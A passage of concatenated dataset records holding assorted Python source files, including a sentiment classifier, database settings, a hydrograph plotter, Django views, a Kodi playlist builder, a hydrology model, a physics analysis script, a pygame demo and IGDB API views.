Image.fromarray(recover_image(img_output.data.cpu().numpy())[0])\noutput_img.save(\"amber_resnet2.png\")\n\n","sub_path":"fast_neural_style_resnet.py","file_name":"fast_neural_style_resnet.py","file_ext":"py","file_size_in_byte":11167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"224875888","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 26 12:09:29 2020\n\n@author: sakib\n\"\"\"\n\nimport pandas as pd\nfrom read_stanford_sentiment_treebank import read_data\nimport re\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import f1_score\n\n\n\ndataset = read_data('/media/sakib/alpha/work/EmotionDetectionDir/NaiveBayes/stanfordSentimentTreebank')\ndataset['sentiment_values'] = pd.to_numeric(dataset['sentiment_values'], downcast = 'float')\ndataset['sentiment_values'] = (dataset['sentiment_values'] >= 0.4).astype(float)\n\nreview_lines = list()\nlines = dataset['Phrase'].values.tolist()\nsentiment = dataset['sentiment_values']\n\n\nfor line in lines:\n review = re.sub('[^a-zA-Z]', ' ', line)\n review = review.lower()\n review_lines.append(review)\n\n\ndf = pd.DataFrame(\n {'phrase': review_lines,\n 'sentiment': sentiment\n })\n\ndf['phrase'] = df['phrase'].str.lstrip()\n\nfilter = df['phrase'] != \"\"\ndfNew = df[filter]\n\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n# Create feature vectors\nvectorizer = TfidfVectorizer(min_df = 5,\n max_df = 0.8,\n sublinear_tf = True,\n use_idf = True)\nX = vectorizer.fit_transform(dfNew['phrase'])\ny = dfNew['sentiment']\n\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)\n\n\nfrom sklearn.naive_bayes import GaussianNB\nclassifier = GaussianNB()\nclassifier.fit(X_train.toarray(), y_train)\n\n\ny_pred = classifier.predict(X_test.toarray())\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\nprint('Accuracy: %.3f' % accuracy_score(y_test, y_pred))\nprint('Precision: %.3f' % precision_score(y_test, y_pred))\nprint('Recall: %.3f' % recall_score(y_test, y_pred))\nprint('F-measure: %.3f' % f1_score(y_test, y_pred))\n\n\n\n# -*- coding: utf-8 -*-\n\n","sub_path":"stanfordSentimentTreebank/NB_2.py","file_name":"NB_2.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"525542380","text":"from pymongo import *\n#client = MongoClient()\n#db = client['test-db34']\n\n #ec2-52-91-156-83.compute-1.amazonaws.com\nconn = MongoClient(\"ec2-54-197-14-189.compute-1.amazonaws.com:27017\")\ndb = conn.Agnes\n\neventsdb = db['events']\nevents_pastdb = db['events_past']\nusersdb = db['users']\ngroupsdb = db['groups']\nuser_eventsdb = db['usersevents']\nuser_groupsdb = db['usersgroups']\nuser_eventslogdb = db['userseventslog']\nusermodeldb = db['usermodel']\neventmodeldb = db['eventmodel_stem_binary']\nUMBC_similaritydb = db['UMBC_similarity']\nUMBC_similaritydb_without = db['UMBC_similarity_without']\n\n\n#user_eventsdb.aggregate([{ \"$match\": { \"users_id\" : ObjectId(\"57802158b2a8c24410d8dd60\"), \"evtdata.random\":1 } },{ \"$redact\": {\"$cond\": [{ \"$eq\": [ { \"$ifNull\": [ \"$random\", 1 ] }, 1 ] },\"$$DESCEND\", \"$$PRUNE\"]}}]);","sub_path":"db_settings.py","file_name":"db_settings.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"86431683","text":"# Force matplotlib to not use any Xwindows backend.\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport sys\nfrom plotnine import *\nimport xarray as xr\nimport pandas as pd\n\ndef plot_hydrographs(channel_files: list,image_filename: str,feature_id: int,obs_file: str=None)->str:\n \"\"\"Example function to plot a timeseries of streamflow for a given feature_id from wrf_hydro CHANOBS files.\n\n Args:\n channel_files: A list of CHANOBS output files from wrf-hydro > v5.0\n image_filename: A string path for .png plot output filename.\n feature_id: The feature_id to plot\n obs_file: An optional string path to an observed value csv file with the following structure, col1 = site number,\n col2 = datetime, col3 = streamflow, m/s\n\n Returns:\n A string including the plot file output path.\n \"\"\"\n\n #Open the netcdfdataset\n chrtout_data = xr.open_mfdataset(channel_files)\n\n #Select one feature_id, optional. Can load all into memory by omitting this\n #Note that this is still subject to the same limitations of HDF5/netCDF4. Non-contiguous indices\n #can't be extracted in one disk read. Thus, if selecting many non-contiguous indices\n #from many files, it is almost always much slower than loading into memory before subsetting\n chrtout_data = chrtout_data.loc[dict(feature_id=feature_id)]\n\n #Load into memory as a pandas.dataframe\n chrtout_data = chrtout_data.to_dataframe()\n\n #Flatten index into a variable for plotting\n chrtout_data = chrtout_data.reset_index(level='time')\n\n #Make feature id a string for plotting\n chrtout_data['feature_id'] = chrtout_data['feature_id'].astype(str)\n\n\n #optionaly get the observed data\n if obs_file is not None:\n obs_data = pd.read_csv(obs_file)\n obs_data['dateTime']=pd.to_datetime(obs_data['dateTime'])\n obs_data=obs_data.rename(index=str,columns={'dateTime':'time','streamflow_cms':'streamflow_obs'})\n\n chrtout_data = chrtout_data.rename(index=str,columns={'streamflow':'streamflow_mod'})\n chrtout_data = chrtout_data[['feature_id','time','streamflow_mod']]\n chrtout_data = pd.merge(chrtout_data,obs_data,\n how='left',\n left_on=['time'],\n right_on=['time'])\n chrtout_data=pd.melt(chrtout_data,id_vars=['feature_id','site_no','time'])\n\n #Plot it\n hydrograph = ggplot(chrtout_data,aes(x='time',y='value',color='variable')) + \\\n geom_line() + \\\n scale_x_datetime(breaks='1 days') + \\\n labs(x='Date',y='Streamflow, cms',title='Modelled and Observed streamflow at feature_id '+str(feature_id)) + \\\n theme_bw()\n hydrograph.save(image_filename,'png',height=8,width=8)\n else:\n #Plot it\n hydrograph = ggplot(chrtout_data,aes(x='time',y='streamflow')) + \\\n geom_line() + \\\n scale_x_datetime(breaks='1 days') + \\\n labs(x='Date',y='Streamflow, cms',title='Modelled and Observed streamflow at feature_id '+str(feature_id)) + \\\n theme_bw()\n hydrograph.save(image_filename,'png',height=8,width=8)\n\n return('Plot saved as '+image_filename)\n\ndef main(chanout_dir: str,image_filename: str)->None:\n \"\"\"Main body of plotting script outputing a plot to the specified filename path.\n\n Args:\n chanout_dir: A string specifying the directory containing the wrf-hydro CHANOBS files\n image_filename: A string specifying the output path for the plot.\n\n Returns:\n Returns None and outputs a plot to the specified path\n \"\"\"\n channel_files=chanout_dir+'/*CHANOBS*'\n plot_hydrographs(channel_files=channel_files,\n image_filename=image_filename,\n feature_id=6226948,\n obs_file='/home/docker/domain/croton_NY/Croton_usgsObs_01374559.csv')\n\nif __name__ == '__main__':\n main(chanout_dir=sys.argv[1],image_filename=sys.argv[2])\n","sub_path":"training/plot_hydrograph.py","file_name":"plot_hydrograph.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"438646740","text":"from django import forms\n\nfrom datamodel.models import CertRecord\nfrom util.base.view import BaseView\nfrom util.decorator.auth import cms_auth\nfrom util.decorator.param import validate_args, fetch_object\nfrom util.decorator.permission import cms_permission\n\n\nclass CertRecordList(BaseView):\n\n @cms_auth\n @cms_permission('filterCertRecord')\n @validate_args({\n 'stage': forms.IntegerField(required=False),\n })\n def get(self, request, stage=None, **kwargs):\n filter = {}\n if stage:\n filter['stage'] = stage\n qs = CertRecord.objects.filter(**filter)\n return self.success_list(request, qs, cert_to_josn)\n\n\nclass CertRecordDetail(BaseView):\n @cms_auth\n @cms_permission('certRecordDetail')\n @fetch_object(CertRecord.objects, 'cert')\n def get(self, request, cert, **kwargs):\n return self.success(cert_to_josn(cert))\n\n\ndef cert_to_josn(cert):\n return {\n 'id': cert.id,\n 'name': cert.name,\n 'pic': cert.certificate.url,\n 'stage': cert.stage,\n }\n","sub_path":"cms/cert/list_detail.py","file_name":"list_detail.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"220164973","text":"# -*- coding: utf8 -*-\nimport os\nimport re\nimport sys\nimport xbmc\nimport requests\n\nreload(sys) \nsys.setdefaultencoding('utf8')\n\nclass Playlist:\n name = 'playlist.m3u'\n channels = []\n raw_m3u = None\n append = True\n \n def __init__(self, name = ''):\n if name != '':\n self.name = name\n \n def save(self, path):\n file_path = os.path.join(path, self.name)\n xbmc.log(\"Запазване на плейлистата: %s \" % file_path, xbmc.LOGNOTICE)\n if os.path.exists(path):\n with open(file_path, 'w') as f:\n f.write(self.to_string().encode('utf-8', 'replace'))\n \n def concat(self, new_m3u, append = True, raw = True):\n if raw: #TODO implement parsing playlists\n self.append = append\n with open(new_m3u, 'r') as f:\n self.raw_m3u = f.read().replace('#EXTM3U', '')\n \n def to_string(self):\n output = ''\n for c in self.channels:\n output += c.to_string()\n \n if self.raw_m3u != None:\n if self.append:\n output += self.raw_m3u\n else:\n output = self.raw_m3u + output\n \n return '#EXTM3U\\n' + output\n\nclass Category:\n\tdef __init__(self, id, title):\n\t\tself.id = id\n\t\tself.title = title\n \nclass Channel:\n\n def __init__(self, attr):\n self.id = attr[0]\n self.disabled = attr[1] == 1\n self.name = attr[2]\n self.category = attr[3]\n self.logo = attr[4]\n self.streams = attr[5]\n self.playpath = '' if attr[6] == None else attr[6]\n self.page_url = '' if attr[7] == None else attr[7]\n self.player_url = '' if attr[8] == None else attr[8]\n self.epg_id = '' if attr[9] == None else attr[9]\n self.user_agent = False if attr[10] == None else attr[10]\n\n def to_string(self):\n output = '#EXTINF:-1 radio=\"False\" tvg-shift=0 group-title=\"%s\" tvg-logo=\"%s\" tvg-id=\"%s\",%s\\n' % (self.category, self.logo, self.epg_id, self.name)\n output += '%s\\n' % self.playpath\n return output \n \nclass Stream:\n def __init__(self, attr):\n self.id = attr[0] \n self.channel_id = attr[1] \n self.url = attr[2]\n self.page_url = attr[3]\n self.player_url = attr[4]\n self.disabled = attr[5] == 1\n self.comment = attr[6]\n self.user_agent = False if attr[9] == None else attr[9]\n if self.url == None:\n self.url = self.resolve()\n if self.url is not None and self.user_agent: \n self.url += '|User-Agent=%s' % self.user_agent\n \n def resolve(self):\n #if '3583019' in self.player_url: #BiT\n #\treturn self._livestream()\n headers = {'User-agent': self.user_agent, 'Referer':self.page_url}\n res = requests.get(self.player_url, headers=headers)\n m = re.compile('(//.*\\.m3u.*?)[\\s\\'\"]+').findall(res.text)\n if len(m) == 0:\n xbmc.log(res.text, xbmc.LOGNOTICE)\n else:\n if not m[0].startswith(\"http:\") and not m[0].startswith(\"https:\"): #some links omit the http prefix\n m[0] = \"http:\" + m[0]\n xbmc.log('Намерени %s съвпадения в %s' % (len(m), self.player_url), xbmc.LOGNOTICE)\n stream = None if len(m) == 0 else m[0]\n xbmc.log('Извлечен видео поток %s' % stream, xbmc.LOGNOTICE)\n return stream\n","sub_path":"resources/lib/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"489814451","text":"import numpy as np\nfrom numba import njit\n\n\n@njit\ndef evapotranspiration_daily(plant_factor, available_soil_et, evaporation_node, root_max, anetd,\n n_soil_increments, depth, soil_water, wilting_point, available_water, delta_x):\n\n soil_layer_loss = np.zeros(n_soil_increments, dtype=np.float32)\n et_factor = np.zeros(n_soil_increments, dtype=np.float32)\n\n # Set ET node and adjust et_depth by maximum root depth, scaled by plant growth factor\n et_node = evaporation_node\n if plant_factor > 0:\n et_depth = plant_factor * root_max\n if et_depth > anetd:\n et_node = find_node(depth, et_depth)\n\n # Reduce available soil ET if soil moisture < 0.6 of available water (PRZM5 Manual 4.8)\n total_soil_water = soil_water[:et_node].sum()\n total_available_water = available_water[:et_node].sum()\n if total_available_water > 0:\n frac = total_soil_water / total_available_water\n if frac < 0.6:\n available_soil_et *= frac\n\n # Calculate ET for each node, adjusted for depth\n for i in range(et_node):\n et_factor[i] = max(0., (depth[et_node] - depth[i] + delta_x[i]) * (soil_water[i] - wilting_point[i]))\n et_sum = et_factor.sum()\n if et_sum > 0:\n for i in range(et_node):\n soil_layer_loss[i] = available_soil_et * (et_factor[i] / et_sum)\n\n return soil_layer_loss, et_node\n\n\n@njit\ndef find_node(depth, target_depth):\n return np.argmin(np.abs(depth - target_depth))\n\n\n@njit\ndef initialize_irrigation(field_capacity, wilting_point, irrigation_type, depth, root_max,\n irr_depletion, available_water):\n \"\"\"\n Calculate total available water (field) capacity, irrigation trigger based on rooting depth\n Source: PRZM5 Manual, Section 4.4 (Young and Fry, 2016)\n \"\"\"\n if irrigation_type > 0:\n irrigation_node = find_node(depth, root_max)\n target_dryness = 0\n for i in range(irrigation_node):\n target_dryness += available_water[i] * irr_depletion + wilting_point[i]\n total_fc = np.sum(field_capacity[:irrigation_node])\n return total_fc, target_dryness, irrigation_node\n else:\n return None, None, None\n\n\n@njit\ndef leaching_daily(initial_input, n_soil_increments, field_capacity, soil_water, et_node, wilting_point,\n soil_layer_loss):\n leaching = np.zeros(n_soil_increments, dtype=np.float32)\n remaining_leachate = initial_input\n for node in range(n_soil_increments):\n water_in_node = remaining_leachate - soil_layer_loss[node] + soil_water[node]\n leaching[node] = max(water_in_node - field_capacity[node], 0.)\n soil_water[node] = max(water_in_node - leaching[node], wilting_point[node])\n # TODO - keeping this for the moment, but it seems like this part should be taken care of in evapotranspiration\n if leaching[node] <= 0. and node > et_node:\n leaching[node:n_soil_increments] = 0.\n break\n remaining_leachate = leaching[node]\n return leaching, soil_water\n\n\n@njit\ndef partition_precip_daily(precip, temp, snow_accumulation, sfac, irrigation_type, soil_water, irrigation_node, s,\n target_dryness, total_fc, leaching_factor):\n # Calculate snow accumulation/melt (effective rain is rain + snow melt)\n if temp <= 0:\n\n snow_accumulation += precip\n rain = effective_rain = 0\n else:\n rain = precip\n snow_melt = min(snow_accumulation, (sfac / 100) * temp)\n effective_rain = rain + snow_melt\n snow_accumulation -= snow_melt\n\n # Process irrigation\n if effective_rain <= 0. and irrigation_type > 0:\n current_dryness = np.sum(soil_water[:irrigation_node])\n daily_max_irrigation = 0.2 * s\n if current_dryness < target_dryness:\n irrigation_required = (total_fc - current_dryness) * leaching_factor + 1.\n if irrigation_type == 3: # overcanopy irrigation\n rain = effective_rain = min(irrigation_required, daily_max_irrigation)\n elif irrigation_type == 4: # undercanopy irrigation\n effective_rain = min(irrigation_required, daily_max_irrigation)\n\n return rain, effective_rain, snow_accumulation\n\n\n@njit\ndef runoff_and_interception_daily(rain, effective_rain, s, plant_factor, crop_intercept, canopy_water, pet):\n # Determine runoff by the Curve Number Method\n if effective_rain > (0.2 * s):\n runoff = max(0, (effective_rain - (0.2 * s)) ** 2 / (effective_rain + (0.8 * s)))\n else:\n runoff = 0\n\n # Determine canopy intercept\n if rain > 0.:\n # a_c_g is the % of RAIN not going to runoff\n available_canopy_gain = rain * (1. - runoff / effective_rain)\n interception = min(available_canopy_gain, (crop_intercept * plant_factor) - canopy_water)\n canopy_water += interception\n else:\n interception = 0\n canopy_water = max(0., canopy_water - pet)\n\n # Anything that doesn't runoff or get held up is leaching\n leaching = effective_rain - runoff - interception\n\n # Any PET not used to evaporate canopy water is still available\n excess_et = max(0., pet - canopy_water)\n return runoff, leaching, canopy_water, excess_et\n\n\n@njit\ndef surface_hydrology(field_capacity, wilting_point, plant_factor, cn, depth, # From other function output\n irrigation_type, irr_depletion, anetd, root_max, leaching_factor, cintcp, # From scenario\n precip, temp, potential_et, # From metfile\n n_soil_increments, delta_x, sfac): # From parameters\n \"\"\" Process hydrology parameters, returning daily runoff, soil water content, and leaching (velocity) \"\"\"\n # Initialize arrays and running variables\n # Daily time series\n n_dates = plant_factor.size\n surface_velocity = np.zeros(n_dates, dtype=np.float32)\n surface_soil_water = np.zeros(n_dates, dtype=np.float32)\n daily_rain = np.zeros(n_dates, dtype=np.float32)\n daily_effective_rain = np.zeros(n_dates, dtype=np.float32)\n daily_runoff = np.zeros(n_dates, dtype=np.float32)\n\n # Soil profile arrays (by node)\n soil_water = field_capacity.copy() # initialize at field capacity\n\n # Calculate these ahead of time for efficiency\n usle_s_factor = ((2540 / cn) - 25.4) / 100. # cm -> m\n available_water = field_capacity - wilting_point\n\n total_fc, target_dryness, irrigation_node = \\\n initialize_irrigation(field_capacity, wilting_point, irrigation_type, depth, root_max, irr_depletion,\n available_water)\n\n # Set evaporation node\n evaporation_node = find_node(depth, anetd)\n\n # Running variables\n canopy_water = 0\n snow_accumulation = 0\n\n for day in range(precip.size):\n # 'rain' is water from above the canopy, 'effective rain' is above AND below canopy\n rain, effective_rain, snow_accumulation = \\\n partition_precip_daily(precip[day], temp[day], snow_accumulation, sfac, irrigation_type, soil_water,\n irrigation_node, usle_s_factor[day], target_dryness, total_fc, leaching_factor)\n\n runoff, leaching, canopy_water, available_soil_et = \\\n runoff_and_interception_daily(rain, effective_rain, usle_s_factor[day], plant_factor[day], cintcp, canopy_water,\n potential_et[day])\n\n soil_layer_loss, et_node = \\\n evapotranspiration_daily(plant_factor[day], available_soil_et, evaporation_node, root_max, anetd,\n n_soil_increments, depth, soil_water, wilting_point, available_water, delta_x)\n\n velocity, soil_water = \\\n leaching_daily(leaching, n_soil_increments, field_capacity, soil_water, et_node, wilting_point,\n soil_layer_loss)\n\n surface_velocity[day] = velocity[0]\n surface_soil_water[day] = soil_water[0]\n daily_rain[day] = rain\n daily_effective_rain[day] = effective_rain\n daily_runoff[day] = runoff\n\n return daily_runoff, daily_rain, daily_effective_rain, surface_soil_water, surface_velocity\n","sub_path":"hydrology.py","file_name":"hydrology.py","file_ext":"py","file_size_in_byte":8169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"583919282","text":"import ROOT\n\nk_low, k_up = 0.93, 1.13\n\nfolder = \"bkgAndSigPlots\"\ntitle = \"Dijet matching efficiency for M = XXX GeV \"\ncolors = [\nROOT.kBlack,\n\nROOT.kRed,\nROOT.kBlue,\nROOT.kMagenta,\nROOT.kCyan+1,\nROOT.kGreen+2,\nROOT.kYellow+1,\n\nROOT.kGray+2,\n\nROOT.kViolet,\nROOT.kAzure,\nROOT.kTeal,\nROOT.kSpring,\n\nROOT.kOrange,\nROOT.kPink,\n]\n\n\n# ROOT.gROOT.SetBatch(0)\n# canv2 = ROOT.TCanvas()\n\n\npreselection = \"HTgoodJets>250\"\n#preselection = \"HTgoodJets>350 && mhtAK4<110\"\n#preselection = \"isr_pt>70 && dijet_pt>140 && jet2_pt>45 && jet1_pt>90 && HTgoodJets>350 && trijet_dr<3.4 && fabs(trijet_eta)>0.3 && abs(dijet_deta)<1.2 && abs(trijet_dphi)<1.8 && mhtAK4Sig<0.11 && met<100 && mhtAK4<110\"\n\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 && mhtAK4<110 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 && mhtAK4<110 && met<100 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 && mhtAK4<110 && met<100 && isr_pt>70 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 && mhtAK4<110 && met<100 && isr_pt>70 && fabs(trijet_eta)>0.3 \"\n\n\n\ncommon = \"1\"\ncommon = \" run<=280385 && abs(jet1_eta)<2.5 && abs(jet2_eta)<2.5 && abs(isr_eta)<2.5 && HLT_CaloScoutingHT250 && HTgoodJets>0 && isr_pt>=50\" #&& && abs(dijet_deta)<1.1\n\npreselections = [\n# common + \"&& isr_pt>=0\",\n# common + \"&& isr_pt>=30\",\n# common + \"&& isr_pt>=40\",\n common + \"&& isr_pt>=50\",\n# common + \"&& isr_pt>=60\",\n #common + \"&& isr_pt>=70\",\n #common + \"&& isr_pt>=80\",\n #common + \"&& isr_pt>=90\",\n #common + \"&& isr_pt>=100\",\n #common + \"&& isr_pt>=110\",\n #common + \"&& isr_pt>=120\",\n #common + \"&& isr_pt>=130\",\n #common + \"&& isr_pt>=140\",\n #common + \"&& isr_pt>=150\",\n #common + \"&& isr_pt>=160\",\n #common + \"&& isr_pt>=170\",\n #common + \"&& isr_pt>=180\",\n #common + \"&& isr_pt>=190\",\n #common + \"&& isr_pt>=200\",\n]\n\n\ncommon = common + \"&& dijet_mass>=540\"\npreselections = [\n common + \"&& dijet_mass<=600\",\n common + \"&& dijet_mass<=605\",\n common + \"&& dijet_mass<=610\",\n common + \"&& dijet_mass<=615\",\n common + \"&& dijet_mass<=620\",\n common + \"&& dijet_mass<=625\",\n common + \"&& dijet_mass<=630\",\n common + \"&& dijet_mass<=635\",\n common + \"&& dijet_mass<=640\",\n common + \"&& dijet_mass<=645\",\n common + \"&& dijet_mass<=650\",\n common + \"&& dijet_mass<=655\",\n common + \"&& dijet_mass<=660\",\n common + \"&& dijet_mass<=665\",\n common + \"&& dijet_mass<=670\",\n common + \"&& dijet_mass<=675\",\n common + \"&& dijet_mass<=680\",\n common + \"&& dijet_mass<=685\",\n common + \"&& dijet_mass<=690\",\n common + \"&& dijet_mass<=695\",\n common + \"&& dijet_mass<=700\",\n common + \"&& dijet_mass<=705\",\n]\n\ncommon = common + \"&& dijet_mass<=680\"\npreselections = [\n common + \"&& dijet_mass>=600\",\n common + \"&& dijet_mass>=590\",\n common + \"&& dijet_mass>=585\",\n common + \"&& dijet_mass>=580\",\n common + \"&& dijet_mass>=575\",\n common + \"&& dijet_mass>=570\",\n common + \"&& dijet_mass>=565\",\n common + \"&& dijet_mass>=560\",\n common + \"&& dijet_mass>=555\",\n common + \"&& dijet_mass>=550\",\n common + \"&& dijet_mass>=545\",\n]\n\ncommon = common + \"&& dijet_mass<=680\"\npreselections = [\n common + \"&& abs(dijet_deta)<1.7\",\n common + \"&& abs(dijet_deta)<1.6\",\n common + \"&& abs(dijet_deta)<1.5\",\n common + \"&& abs(dijet_deta)<1.4\",\n common + \"&& abs(dijet_deta)<1.3\",\n common + \"&& abs(dijet_deta)<1.2\",\n common + \"&& abs(dijet_deta)<1.1\",\n common + \"&& abs(dijet_deta)<1.0\",\n common + \"&& abs(dijet_deta)<0.9\",\n common + \"&& abs(dijet_deta)<0.8\",\n]\n\n\n\n\n#mcReco_matching = \"mcReco_matching && method_jets01 && isrMC_pt>0\"\nmcReco_matching = \"1\"\n\nhistos = []\n\nROOT.gStyle.SetOptStat(0)\nROOT.gROOT.SetBatch(1)\ncanv = ROOT.TCanvas(\"canv\",\"\",1280,720)\ncanv.SetGridx()\ncanv.SetGridy()\n#canv.SetLogy()\n\n\nfileNameBkg = \"../ntupleTrigger/CaloJet40Skim.root\"\n\nfileNames = [\n# \"../output/test_reduced_skim_new.root\",\n# \"../CaloScoutingHT250.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_25_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_50_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_75_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_100_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_125_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_150_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_200_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_300_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_400_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_500_13TeV.root\",\n \"../ntupleSignal/VectorDiJet1Jet_600_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_800_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_1000_13TeV.root\",\n]\n\nimport copy\nsignals = {}\nmaxim = 0\nfileBkg = ROOT.TFile(fileNameBkg)\ntreeBkg = fileBkg.Get(\"rootTupleTree/tree\")\n\nfor preselection in preselections:\n print(preselection)\n for fileName in fileNames:\n #print(\"Opening %s\"%(fileName))\n mass = fileName.split(\"VectorDiJet1Jet_\")[1]\n mass = mass.split(\"_\")[0]\n file_ = ROOT.TFile(fileName)\n tree = file_.Get(\"rootTupleTree/tree\")\n if type(tree) != ROOT.TTree: \n print(\"WARNING: skipping %s\"%fileName)\n continue\n m = int(mass)\n m_low = m*k_low \n m_up = m*k_up \n print(m_low,m_up)\n sel = preselection + \"&& (dijet_mass>%d) && (dijet_mass<%d)\"%(m_low, m_up)\n signal = tree.Draw(\"\", sel+\"&&\"+ mcReco_matching)\n bkg = treeBkg.Draw(\"\", sel)\n print(preselection)\n print(\"mass = %s ; S/sqrt(B) = %f ; S/B = %f; S = %d; B = %d\"%(mass, (1.*signal/bkg**0.5/14.143060), (1.*signal/bkg), signal, bkg))\n file_.Close()\n\n","sub_path":"silvio/oldCode/Sensitivity.py","file_name":"Sensitivity.py","file_ext":"py","file_size_in_byte":6625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"215017306","text":"import pygame\n\npygame.init()\nOX = 600\nOY = 600\nwin = pygame.display.set_mode((OX, OY))\n\npygame.display.set_caption(\"COMPUTER TRAINING CENTER GAME\")\n\nx = 10\nwidth = 30\nheight = 30\nspeed = 25\ny = OY - speed - height\n\n\nisJump = False\njumpCount = 10\nleft = False\nright = False\nanimcount = 0\n\nrun = True\nwhile run:\n pygame.time.delay(50)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and x > speed:\n x -= speed\n elif keys[pygame.K_RIGHT] and x < OX - speed - width:\n x += speed\n if not(isJump):\n if keys[pygame.K_SPACE]:\n isJump = True\n else:\n if jumpCount >= -10:\n if jumpCount < 0:\n y += (jumpCount ** 2)/2\n else:\n y -= (jumpCount ** 2)/2\n jumpCount -= 1\n else:\n isJump = False\n jumpCount = 10\n\n\n win.fill((0,0,0))\n pygame.draw.rect(win, (0 , 0, 255), (x, y , width, height))\n pygame.display.update()\n\npygame.quit()\n","sub_path":"pygamee/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"162467804","text":"import requests\nfrom django.conf import settings\nfrom rest_framework.decorators import api_view\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.response import Response\nfrom .fields import game_fields, search_fields, popular_fields, backdrop_fields\nfrom .models import Game\n\n\n@api_view(['GET'])\ndef get_game(request, slug):\n \"\"\"Get a game from IGDB.\n\n Makes a call to the `https://api-v3.igdb.com/games` endpoint, specifying the\n fields (defined as `game_fields` in fields.py) and game ID in the POST data.\n \n For more details read https://api-docs.igdb.com/?javascript#game.\n\n Args:\n slug: unique name of the game e.g. dark-souls, prey, prey--1.\n\n Returns:\n game: a JSON response containing the details of a game.\n \"\"\"\n data = f'fields {game_fields}; where slug=\"{slug}\";'\n headers = {'user-key': settings.IGDB_KEY}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers).json()\n\n if not r:\n raise NotFound(detail='Game not found.')\n\n return Response(r)\n\n\n@api_view(['GET'])\ndef search_game(request, name):\n \"\"\"Search a game based on a name.\n \n Calls `https://api-v3.igdb.com/games` specifying the search term in the\n POST data. The search term must be a string, the name of the game. The\n fields shown in the results are defined in `search_fields` from fields.py.\n \n For more details on how to search the IGDB API, read \n https://api-docs.igdb.com/?javascript#search-176.\n\n Args:\n name: the search term, name of the desired game.\n\n Returns:\n games: a JSON containing a list of search results.\n \"\"\"\n data = f'fields {search_fields}; search \"{name}\";'\n headers = {'user-key': settings.IGDB_KEY}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_popular_games(request):\n \"\"\"Gets popular or trending games.\n \n Calls the `games` endpoint, sorting the results by popularity (desc).\n This endpoint is called in Overworld's landing page. An example of this\n is documented on IGDB https://api-docs.igdb.com/?javascript#examples-12. \n\n Returns:\n games: six games sorted by popularity.\n \"\"\"\n data = f'fields {popular_fields}; sort popularity desc; 